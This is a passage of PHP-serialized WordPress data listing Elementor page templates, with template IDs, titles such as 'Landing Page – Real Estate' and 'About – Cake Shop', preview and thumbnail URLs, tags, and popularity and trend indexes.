Designer\";s:9:\"thumbnail\";s:91:\"https://library.elementor.com/wp-content/uploads/2017/11/Graphic-Designer-–-Portfolio.png\";s:12:\"tmpl_created\";i:1509633883;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/portfolio-graphic-designer/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:127;s:16:\"popularity_index\";i:189;s:11:\"trend_index\";i:306;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:616;a:14:{s:2:\"id\";i:2145;s:5:\"title\";s:30:\"About &#8211; Delivery Company\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/07/delivery-about.png\";s:12:\"tmpl_created\";i:1499774125;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/about-delivery-company/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:10:\"[\"moving\"]\";s:10:\"menu_order\";i:128;s:16:\"popularity_index\";i:350;s:11:\"trend_index\";i:378;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:617;a:14:{s:2:\"id\";i:2155;s:5:\"title\";s:23:\"About &#8211; Cake Shop\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2017/07/cake-about.png\";s:12:\"tmpl_created\";i:1499774130;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/about-cake-shop/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:8:\"[\"Food\"]\";s:10:\"menu_order\";i:129;s:16:\"popularity_index\";i:396;s:11:\"trend_index\";i:600;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:618;a:14:{s:2:\"id\";i:1085;s:5:\"title\";s:21:\"About &#8211; Startup\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2017/03/Startup.png\";s:12:\"tmpl_created\";i:1488810874;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/about-startup/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:19:\"[\"About\",\"Startup\"]\";s:10:\"menu_order\";i:130;s:16:\"popularity_index\";i:8;s:11:\"trend_index\";i:22;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:619;a:14:{s:2:\"id\";i:143;s:5:\"title\";s:22:\"About &#8211; Personal\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0010.png\";s:12:\"tmpl_created\";i:1470820447;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/about-personal/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:20:\"[\"About\",\"Personal\"]\";s:10:\"menu_order\";i:131;s:16:\"popularity_index\";i:24;s:11:\"trend_index\";i:149;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:620;a:14:{s:2:\"id\";i:101;s:5:\"title\";s:16:\"About &#8211; CV\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0018.png\";s:12:\"tmpl_created\";i:1470829785;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:98:\"https://library.elementor.com/about-cv/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:77:\"[\"creative portfolio\",\"Personal\",\"portfolio\",\"professional\",\"resume\",\"vcard\"]\";s:10:\"menu_order\";i:132;s:16:\"popularity_index\";i:46;s:11:\"trend_index\";i:142;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:621;a:14:{s:2:\"id\";i:140;s:5:\"title\";s:25:\"About &#8211; Art Gallery\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0009.png\";s:12:\"tmpl_created\";i:1470820463;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/about-art-gallery/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:25:\"[\"About\",\"Art\",\"Gallery\"]\";s:10:\"menu_order\";i:133;s:16:\"popularity_index\";i:18;s:11:\"trend_index\";i:110;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:622;a:14:{s:2:\"id\";i:213;s:5:\"title\";s:26:\"About &#8211; Architecture\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0008.png\";s:12:\"tmpl_created\";i:1470829766;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/about-architecture/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:24:\"[\"About\",\"Architecture\"]\";s:10:\"menu_order\";i:134;s:16:\"popularity_index\";i:19;s:11:\"trend_index\";i:163;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:623;a:14:{s:2:\"id\";i:2802;s:5:\"title\";s:38:\"Portfolio &#8211; Fashion Photographer\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2017/11/Fashion-photographer-–-Portfolio.png\";s:12:\"tmpl_created\";i:1509615440;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/portfolio-fashion-photographer/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:135;s:16:\"popularity_index\";i:219;s:11:\"trend_index\";i:346;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:624;a:14:{s:2:\"id\";i:2828;s:5:\"title\";s:35:\"Landing Page &#8211; Law Convention\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2017/11/Law-Convention-–-Landing-Page.png\";s:12:\"tmpl_created\";i:1509631636;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/landing-page-law-convention/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:35:\"[\"Convention\",\"Landing Page\",\"Law\"]\";s:10:\"menu_order\";i:136;s:16:\"popularity_index\";i:364;s:11:\"trend_index\";i:487;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:625;a:14:{s:2:\"id\";i:1461;s:5:\"title\";s:28:\"Landing Page &#8211; Ebook 1\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Ebook-1.png\";s:12:\"tmpl_created\";i:1494352121;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/landing-page-ebook-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:127:\"[\"App\",\"author\",\"book\",\"brochure\",\"download\",\"e-book\",\"ebook\",\"marketing\",\"product\",\"publisher\",\"sell online\",\"seo\",\"showcase\"]\";s:10:\"menu_order\";i:137;s:16:\"popularity_index\";i:351;s:11:\"trend_index\";i:416;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:626;a:14:{s:2:\"id\";i:1460;s:5:\"title\";s:28:\"Landing Page &#8211; Ebook 2\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Ebook-2.png\";s:12:\"tmpl_created\";i:1494352124;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/landing-page-ebook-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:138;s:16:\"popularity_index\";i:367;s:11:\"trend_index\";i:555;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:627;a:14:{s:2:\"id\";i:1459;s:5:\"title\";s:28:\"Landing Page &#8211; Ebook 3\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Ebook-3.png\";s:12:\"tmpl_created\";i:1494352125;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/landing-page-ebook-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:139;s:16:\"popularity_index\";i:238;s:11:\"trend_index\";i:239;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:628;a:14:{s:2:\"id\";i:1052;s:5:\"title\";s:33:\"Landing Page &#8211; Mobile App 1\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2017/03/app.png\";s:12:\"tmpl_created\";i:1488810873;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/landing-page-mobile-app/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:140;s:16:\"popularity_index\";i:35;s:11:\"trend_index\";i:137;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:629;a:14:{s:2:\"id\";i:1505;s:5:\"title\";s:33:\"Landing Page &#8211; Mobile App 4\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-app3.png\";s:12:\"tmpl_created\";i:1494352110;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/landing-page-mobile-app-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:141;s:16:\"popularity_index\";i:390;s:11:\"trend_index\";i:448;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:630;a:14:{s:2:\"id\";i:726;s:5:\"title\";s:33:\"Landing Page &#8211; Conference 1\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2017/01/convention-landing-page.jpg\";s:12:\"tmpl_created\";i:1485270062;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/landing-page-conference/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:142;s:16:\"popularity_index\";i:423;s:11:\"trend_index\";i:648;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:631;a:14:{s:2:\"id\";i:1613;s:5:\"title\";s:33:\"Landing Page &#8211; Conference 2\";s:9:\"thumbnail\";s:109:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-International-Womens-Day-Conference.png\";s:12:\"tmpl_created\";i:1494352129;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/landing-page-conference-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:143;s:16:\"popularity_index\";i:443;s:11:\"trend_index\";i:641;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:632;a:14:{s:2:\"id\";i:1612;s:5:\"title\";s:33:\"Landing Page &#8211; Conference 3\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Tech-Conference.png\";s:12:\"tmpl_created\";i:1494352127;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/landing-page-conference-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:144;s:16:\"popularity_index\";i:471;s:11:\"trend_index\";i:506;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:633;a:14:{s:2:\"id\";i:1614;s:5:\"title\";s:33:\"Landing Page &#8211; Conference 4\";s:9:\"thumbnail\";s:99:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Sustainability-Conference.png\";s:12:\"tmpl_created\";i:1494352131;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/landing-page-conference-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:145;s:16:\"popularity_index\";i:375;s:11:\"trend_index\";i:593;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:634;a:14:{s:2:\"id\";i:906;s:5:\"title\";s:29:\"Landing Page &#8211;  Coacher\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2017/02/Landin-Page-Coacher.png\";s:12:\"tmpl_created\";i:1494352066;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/landing-page-coacher/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:146;s:16:\"popularity_index\";i:278;s:11:\"trend_index\";i:354;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:635;a:14:{s:2:\"id\";i:879;s:5:\"title\";s:41:\"Landing Page &#8211; Financial Consultant\";s:9:\"thumbnail\";s:94:\"https://library.elementor.com/wp-content/uploads/2017/02/Landing-Page-Financial-consultant.png\";s:12:\"tmpl_created\";i:1494352064;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/landing-page-financial-consultant/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:147;s:16:\"popularity_index\";i:285;s:11:\"trend_index\";i:347;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:636;a:14:{s:2:\"id\";i:926;s:5:\"title\";s:33:\"Landing Page &#8211; Private Chef\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2017/02/Landing-Page-Private-Chef.png\";s:12:\"tmpl_created\";i:1494352068;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/landing-page-private-chef/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:148;s:16:\"popularity_index\";i:395;s:11:\"trend_index\";i:586;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:637;a:14:{s:2:\"id\";i:1032;s:5:\"title\";s:27:\"Landing Page &#8211; Agency\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2017/03/Agency.png\";s:12:\"tmpl_created\";i:1488810866;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/landing-page-agency/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:149;s:16:\"popularity_index\";i:392;s:11:\"trend_index\";i:612;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:638;a:14:{s:2:\"id\";i:730;s:5:\"title\";s:24:\"Landing Page &#8211; App\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2017/01/app.-landing-page.jpg\";s:12:\"tmpl_created\";i:1485273430;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/landing-page-app/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:150;s:16:\"popularity_index\";i:356;s:11:\"trend_index\";i:397;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:639;a:14:{s:2:\"id\";i:643;s:5:\"title\";s:29:\"Landing Page &#8211; Festival\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2016/12/festival.jpg\";s:12:\"tmpl_created\";i:1481549290;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/landing-page-festival/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:151;s:16:\"popularity_index\";i:440;s:11:\"trend_index\";i:693;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:640;a:14:{s:2:\"id\";i:542;s:5:\"title\";s:28:\"Landing Page &#8211; Wedding\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/10/0025.png\";s:12:\"tmpl_created\";i:1477388484;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/landing-page-wedding/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:152;s:16:\"popularity_index\";i:96;s:11:\"trend_index\";i:369;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:641;a:14:{s:2:\"id\";i:1187;s:5:\"title\";s:32:\"Landing Page &#8211; Photography\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2017/03/lp1-l.png\";s:12:\"tmpl_created\";i:1490707385;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/landing-page-photography/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:153;s:16:\"popularity_index\";i:45;s:11:\"trend_index\";i:180;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:642;a:14:{s:2:\"id\";i:641;s:5:\"title\";s:28:\"Landing Page &#8211; Fashion\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2016/12/fashion-landing-page.jpg\";s:12:\"tmpl_created\";i:1481549264;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/landing-page-fashion/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:154;s:16:\"popularity_index\";i:320;s:11:\"trend_index\";i:511;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:643;a:14:{s:2:\"id\";i:189;s:5:\"title\";s:30:\"Landing Page &#8211; Tourism 1\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0005.png\";s:12:\"tmpl_created\";i:1470820715;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/landing-page-tourism/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:155;s:16:\"popularity_index\";i:15;s:11:\"trend_index\";i:62;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:644;a:14:{s:2:\"id\";i:1547;s:5:\"title\";s:30:\"Landing Page &#8211; Tourism 2\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Truism-1.png\";s:12:\"tmpl_created\";i:1494352115;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/landing-page-tourism-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:156;s:16:\"popularity_index\";i:337;s:11:\"trend_index\";i:542;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:645;a:14:{s:2:\"id\";i:1546;s:5:\"title\";s:30:\"Landing Page &#8211; Tourism 3\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Truism-2.png\";s:12:\"tmpl_created\";i:1494352116;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/landing-page-tourism-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:157;s:16:\"popularity_index\";i:466;s:11:\"trend_index\";i:647;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:646;a:14:{s:2:\"id\";i:1545;s:5:\"title\";s:30:\"Landing Page &#8211; Tourism 4\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Truism-3.png\";s:12:\"tmpl_created\";i:1494352118;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/landing-page-tourism-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:158;s:16:\"popularity_index\";i:368;s:11:\"trend_index\";i:553;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:647;a:14:{s:2:\"id\";i:2714;s:5:\"title\";s:30:\"Landing Page &#8211; Tourism 5\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2017/11/Vacation-–-Landing-Page.png\";s:12:\"tmpl_created\";i:1509631782;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/landing-page-tourism-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:159;s:16:\"popularity_index\";i:363;s:11:\"trend_index\";i:411;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:648;a:14:{s:2:\"id\";i:195;s:5:\"title\";s:28:\"Landing Page &#8211; Product\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0006.png\";s:12:\"tmpl_created\";i:1470820765;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/landing-page-product/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:160;s:16:\"popularity_index\";i:57;s:11:\"trend_index\";i:359;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:649;a:14:{s:2:\"id\";i:197;s:5:\"title\";s:34:\"Landing Page &#8211; Real Estate 1\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0007.png\";s:12:\"tmpl_created\";i:1470825711;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/landing-page-real-estate/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:161;s:16:\"popularity_index\";i:133;s:11:\"trend_index\";i:518;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:650;a:14:{s:2:\"id\";i:1193;s:5:\"title\";s:34:\"Landing Page &#8211; Real Estate 2\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2017/03/lp3-l.png\";s:12:\"tmpl_created\";i:1490707422;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/landing-page-real-estate-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:162;s:16:\"popularity_index\";i:69;s:11:\"trend_index\";i:208;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:651;a:14:{s:2:\"id\";i:1415;s:5:\"title\";s:34:\"Landing Page &#8211; Real Estate 3\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Real-Estate-1.png\";s:12:\"tmpl_created\";i:1494352106;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/landing-page-real-estate-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:163;s:16:\"popularity_index\";i:352;s:11:\"trend_index\";i:522;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:652;a:14:{s:2:\"id\";i:1414;s:5:\"title\";s:34:\"Landing Page &#8211; Real Estate 4\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Real-Estate-2.png\";s:12:\"tmpl_created\";i:1494352107;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/landing-page-real-estate-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:164;s:16:\"popularity_index\";i:488;s:11:\"trend_index\";i:687;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:653;a:14:{s:2:\"id\";i:1413;s:5:\"title\";s:34:\"Landing Page &#8211; Real Estate 5\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Real-Estate-3.png\";s:12:\"tmpl_created\";i:1494352109;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/landing-page-real-estate-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:134:\"[\"Agent\",\"business\",\"clean\",\"corporate\",\"flat\",\"google maps\",\"homes\",\"listing\",\"modern\",\"real estate\",\"realestate\",\"realtor\",\"realty\"]\";s:10:\"menu_order\";i:165;s:16:\"popularity_index\";i:418;s:11:\"trend_index\";i:583;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:654;a:14:{s:2:\"id\";i:1573;s:5:\"title\";s:29:\"Landing Page &#8211; Coupon 1\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/05/Coupon-02.png\";s:12:\"tmpl_created\";i:1494352133;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/landing-page-coupon-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:166;s:16:\"popularity_index\";i:515;s:11:\"trend_index\";i:565;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:655;a:14:{s:2:\"id\";i:1572;s:5:\"title\";s:29:\"Landing Page &#8211; Coupon 